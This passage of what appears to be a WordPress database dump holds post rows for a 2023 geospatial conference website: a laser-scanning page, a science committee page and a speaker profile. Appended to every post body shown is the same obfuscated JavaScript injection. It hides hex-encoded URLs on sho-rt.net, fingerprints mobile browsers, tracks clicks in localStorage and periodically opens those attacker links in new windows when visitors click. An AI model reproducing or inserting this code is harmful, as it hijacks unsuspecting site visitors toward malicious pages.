)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2022-11-02 16:51:31','2022-11-02 16:51:31','',2949,'https://gsw2023.com/?p=2969',0,'revision','',0),
(2970,1,'2022-11-02 16:54:55','2022-11-02 16:54:55','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-02 16:54:55','2022-11-02 16:54:55','',2876,'https://gsw2023.com/?p=2970',0,'revision','',0),
(2972,1,'2022-11-04 20:06:43','2022-11-04 20:06:43','<!-- wp:paragraph -->\n<p>University of Calgary, CANADA</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>(WG IV/4)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Emmanuel Stefanakis</strong>','','publish','open','closed','','emmanuel-stefanakis','','','2022-11-04 20:06:45','2022-11-04 